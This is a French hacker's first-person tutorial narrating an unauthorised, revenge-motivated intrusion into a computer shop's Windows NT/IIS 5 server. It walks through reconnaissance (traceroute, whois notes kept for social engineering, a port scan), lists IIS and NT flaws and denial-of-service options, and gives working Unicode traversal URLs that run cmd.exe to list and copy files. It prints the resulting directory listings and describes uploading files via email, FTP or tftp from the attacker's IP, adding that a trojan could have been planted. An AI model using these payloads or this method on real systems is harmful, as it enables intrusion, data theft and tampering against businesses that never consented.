EXEMPLE DE HACK n° 3
Me revoie la, pour un nouvelle exemple de hack :) et encore
de nouvelles aventures… putain c un vrai feuilleton !
Bon cette foi si, il
s’agit du hack d’un serveur NT et la plate forme utiliser pour le hack est windows
98.
Je me suis acheter un athlon 1ghz dans une boutique d’informatique. Tout content je rentre chez moi pour le montez et la oh surprise le processeur ne marche pas ! Je vous raconte pas la haine que j’avais ! je retourne donc chez le vendeur qui me rembourse. Et comme j’étais énervé et bah je me suis dis que j’allais me faire le site du magasin ! donc je téléphone au magasin et leur demande l’adresse de leur site, ils me la donnent gentiment.
Je me met de suite au boulot. Comme d’habitude je vais pas vous donner le vrai nom du site, nous allons donc prendre comme exemple www.info.fr.
Je commence par tracer ma victime avec visualroute 5. et je remarque que l’emplacement géographique de ma victime est à peu près la ou se trouve le magasin, j’en déduit donc que le serveur est dans le magasin. Vous allez me dire mais on s’en fou de ça !?… mais non parce que si le serveur est dans le magasin ça veux dire que la nuit il y a personne pour veiller sur le serveur. C’est pas comme pour certains serveur ou ya un gas qui s’occupe de la sécurité du serveur 24h/24. ça veux dire que nous sommes tranquille pendant toutes les horaires de fermeture du magasin. C’est déjà un bon point, car je sais que je pourrai attaquer tranquillement la nuit et que vu la taille du magasin, la sécurité du serveur ne doit pas être terrible (ceci n’est qu’une supposition).
Je continue mon petit travail de routine en faisant un whois. Je note le nom, l’adresse etc… de l’admin dans un fichier. C’est juste au cas ou j’aurai besoin de faire du SE.
Ensuite je fais un scan de port en TCP avec le scanneur du group, et j’obtient ça :
[7] echo
[9]
discard
[13] daytime 03:21:52
27/12/2000
[17] "L'avenir est un lieu commode pour
y mettre des songes" Anatole France (1844-1924)
[80] http
[21]
220 info Microsoft FTP Service (Version 5.0).
[25]
220 info.info.fr ESMTP Service (Worldmail 1.3.167) ready
[106]
3COM-TSMUX 200 User name required
[105] CCSO name server
protocol / Mailbox Name Nameserver
[135] DCE endpoint resolution /
MS RPC
[110] +OK POP3 server ready (Worldmail 1.3.160) <4DD2A09B5152844317@info.info.fr>
[143]
* OK IMAP4 server ready (Worldmail 1.3.160)
[389] Lightweight
Directory Access Protocol
[443] http protocol over TLS/SSL
[674]
* Eudora-AutoConfigure (IMPLEMENTATION "v1.0.1.4") (SASL "PLAIN"
"APOP" "CRAM-MD5") (X-CRAM-
MD5
"<724.977923363@info.info.fr>")
[1028]
[1031]
[1035]
[1036]
[1025]
Bon
now je regarde l’os etc… :
Microsoft
Windows NT
Microsoft IIS 5.0
Bon je crois que j’ai déjà pas mal d’info, et ça me paraît largement suffisant pour hacker se serveur. Avant d’aller chercher sur rootshell ou securityfocus des exploits, je vais d’abord regarder les failles de NT et IIS5 ainsi que les possible sur un port.
1). Je vois que
le port 1031 est ouvert. Je sais que si j’émet une requête telnet
sur ce port et que j’envoie des chaînes parasites et bien le serveur sera
déconnecté. Mais cette faille m’intéresse pas car mon but
n’est pas de crasher le serveur…
2).
Bon ya une
multitude d’autre possibilité de DOS, en l’occurrence avec NTcrash
3).
Il est possible
qu’il y ai la faille du cmd.exe se qui permet d’exécuter des commandes
sur le serveur.
4). Nous
pouvons peut être obtenir le code asp brut des pages en remplacent le
dernier point par %2e
5). Sur
toutes les versions de IIS, il y a un bug avec les nom de fichier long. Par
exemple si le fichier adminpasswd.txt est protéger et bien adminp~1.txt
ne le sera pas. Donc je pourrai y accéder…
Bon ensuite ya beaucoup d’autres failles que je vais pas
présenter, comme le numéro de séquence TCP, Getadmin, Windows
NT backup, fichiers *.doc etc…
On peut également bloquer le serveur
si on envoie une chaîne URL de 4 à 10 ko (varie selon la versions).
Tout
ça c’est bien beau mais maintenant il faut tester pour savoir les failles
présentes ou non.
Celle qui m’attire tout de suite est celle du cmd.exe,
je vais donc voir si cette faille est présente. Je sors IE et je met
dans mon url :
http://www.info.fr/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
Et la j’obtient :
Répertoire de c:\
15/11/2000
12:40 <DIR> Documents
and Settings
15/11/2000 12:45 24
064 host.exe
01/09/2000 10:40 <DIR>
Inetpub
10/11/2000
16:52 66
767 manager.log
10/11/2000 16:42 <DIR>
Program Files
04/10/2000
17:27 <DIR> temp
29/11/2000
15:23 <DIR> WINNT
2
fichier(s) 90 831
octets
5
Rép(s) 2 883 088 384 octets libres
:)
bon bah la c’est un très bon point car la faille du cmd.exe est présente.
Maintenant reste à voir les droits que j’ai en tant qu’utilisateur. Je
vais donc essayer de
copier un fichier :
http://www.info.fr/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\manager.log+c:\joker.txt
cette manœuvre marche nickel ! :)
je vais maintenant
me balader un peu sur leur disque pour voir se qu’il y a d’interessant.
Répertoire de c:\WINNT
29/11/2000 15:23 <DIR>
.
29/11/2000 15:23
<DIR> ..
02/08/2000
17:05 <DIR> addins
01/09/2000
09:27 38
468 Administrateur.acl
02/08/2000 16:17 <DIR>
Application Compatibility
Scripts
02/08/2000 17:06 <DIR>
AppPatch
02/08/2000
15:21 4
015 certocm.log
16/12/1999 01:00 82
944 clock.avi
02/08/2000 15:21 2
976 clusocm.log
02/08/2000 15:20 410
COM+.log
02/08/2000 15:29 48
367 comsetup.log
02/08/2000 17:05 <DIR>
Config
02/08/2000 17:04
<DIR> Connection
Wizard
02/08/2000 15:23 0
control.ini
02/08/2000 17:04 <DIR>
Cursors
26/12/2000
08:51 <DIR> Debug
16/12/1999
01:00 5
392 delttsul.exe
02/08/2000 17:04 <DIR>
Driver Cache
16/12/1999
01:00 239
376 explorer.exe
16/12/1999 01:00 80
explorer.scf
02/08/2000 15:21 0
frontpg.ini
02/08/2000 15:22 <DIR>
Help
16/12/1999 01:00
26
896 hh.exe
02/08/2000 15:30 <DIR>
IIS Temporary Compressed
Files
02/08/2000 15:28 206
466 iis5.log
02/08/2000 15:28 53
223 imsins.log
29/11/2000 15:23 <DIR>
inf
10/11/2000 17:03
8
607 INSTALLLOG.LOG
02/10/1998 20:00 327
168 IsUninst.exe
02/08/2000 15:22 <DIR>
java
02/08/2000 15:21
2
078 LicenOc.log
02/08/2000 17:06 <DIR>
Media
02/08/2000 16:11
96
mmdet.log
02/08/2000 16:11 36
ModemDet.txt
02/08/2000 17:05 <DIR>
msagent
16/12/1999
01:00 1
405 msdfmap.ini
16/12/1996 23:00 38
468 MSO97.ACL
02/08/2000 15:25 <DIR>
mww32
16/12/1999 01:00
51
984 NOTEPAD.EXE
02/08/2000 15:21 16
572 ocgen.log
02/08/2000 15:21 757
ockodak.log
26/12/2000 18:51 1
994 ODBC.INI
01/09/2000 09:26 4
300 ODBCINST.INI
15/11/2000 12:40 1
690 OEWABLog.txt
02/08/2000 15:22 <DIR>
Offline Web Pages
16/12/1999
01:00 119
056 poledit.exe
16/12/1999 01:00 76
048 regedit.exe
02/08/2000 15:20 <DIR>
Registration
02/08/2000
15:40 8
192 REGLOCS.OLD
02/08/2000 15:24 <DIR>
repair
29/11/2000 15:34
13
942 SchedLgU.Txt
26/12/2000 07:51 <DIR>
security
16/12/1999
01:00 14
816 SET33.tmp
16/12/1999 01:00 14
784 SET38.tmp
02/08/2000 15:28 250
907 setupact.log
29/11/2000 15:23 142
053 setupapi.log
02/08/2000 16:08 0
setuperr.log
02/08/2000 15:28 210
845 setuplog.txt
02/08/2000 16:08 <DIR>
Speech
02/08/2000 15:30
0
Sti_Trace.log
29/11/2000 15:21 349
svcpack.log
03/11/2000 13:34 <DIR>
system
02/08/2000 16:08
231
system.ini
26/12/2000 08:51 <DIR>
system32
16/12/1999
01:00 36
112 TASKMAN.EXE
29/11/2000 16:17 <DIR>
Temp
02/08/2000 15:28
8
952 tsoc.log
16/12/1999 01:00 94
864 twain.dll
02/08/2000 15:25 <DIR>
twain_32
16/12/1999
01:00 45
328 twain_32.dll
16/12/1999 01:00 49
680 twunk_16.exe
16/12/1999 01:00 26
384 twunk_32.exe
16/12/1999 01:00 15
120 upwizun.exe
02/08/2000 15:20 36
vb.ini
02/08/2000 15:20 37
vbaddin.ini
16/12/1999 01:00 20
240 vmmreg32.dll
29/11/2000 16:06 577
win.ini
16/12/1999 01:00 256
768 winhelp.exe
16/12/1999 01:00 274
192 winhlp32.exe
16/12/1999 01:00 197
392 winrep.exe
16/12/1999 01:00 707
_default.pif
55
fichier(s) 3 041 380 octets
26
Rép(s) 2 883 088 384 octets libres
Répertoire de c:\progra~1
10/11/2000 16:42 <DIR>
.
10/11/2000 16:42
<DIR> ..
02/08/2000
16:17 <DIR> Accessoires
01/09/2000
10:04 <DIR> Common
Files
02/08/2000 15:20 <DIR>
ComPlus Applications
27/12/2000
16:06 <DIR> Fichiers
communs
14/08/2000 13:46 <DIR>
GlobalSCAPE
02/08/2000
15:22 <DIR> Internet
Explorer
02/08/2000 16:19 <DIR>
Microsoft FrontPage
01/09/2000
09:26 <DIR> Microsoft
Office
02/08/2000 15:22 <DIR>
NetMeeting
10/11/2000
16:34 <DIR> ORL
29/11/2000
15:25 <DIR> Outlook
Express
14/08/2000 13:46 <DIR>
TimeSink
02/08/2000
15:22 <DIR> Windows
Media Player
02/08/2000 15:25 <DIR>
Windows NT
29/11/2000
15:28 <DIR> WindowsUpdate
01/09/2000
08:59 <DIR> WinZip
27/12/2000
16:06 <DIR> WorldMail
0
fichier(s) 0
octets
19
Rép(s) 2 902 888 448 octets libres
Etc… bon je vais pas vous mettre tout le contenue de leur
HD parce que je pense que vous en avez rein à foutre. Je note les versions
et les applications présentes sur le serveur, comme ça au cas
ou je n’est pas tous les droits et bien je pourrai trouver des exploits :) mais
bon les droits que j’ai me suffise…
Maintenant je vais ajouter un fichier
sur le serveur. Je pourrai le défacer mais franchement je n’en voit pas
l’utilité…
Donc pour ajouter un fichier il y a plusieurs moyens :
- Soit j’ envoie un email avec mon fichier en pièce
jointe et j’irai le récupérer sur le HD avec cmd.exe et le copier
vers c:\Inetpub\wwwroot. Ainsi mon fichier sera accessible a l’url www.info.fr/mon_fichier
- Si
il y a un logiciel ftp dans c:\progra~1 j’aurai peut être des accounts
pour uploader dans le ftp en anonyme /inetpub/ftproot
- Soit j’utilise
tftp. Pour cela il me faut un client ftp sur ma bécane (solarwinds) ensuite
je tape tftp+mon_ip+GET+fichier_à_envoyer et voilà :)
Donc je met mon petit message dans mon fichier et je le fou sur le serveur. J’aurai tres bien pu mettre un trojan et l’executer etc… mais bon, je n’envoyait pas l’utilité.
Voili voulou comment j’ai hacker cette cible.
J’aimerai faire un spécial GREETS à Rozwell qui ma aider pour les différentes techniques pour créer un fichier. J’en connaissais qu’une et il ma appris les autres.
Merci rozwell
By The JokeR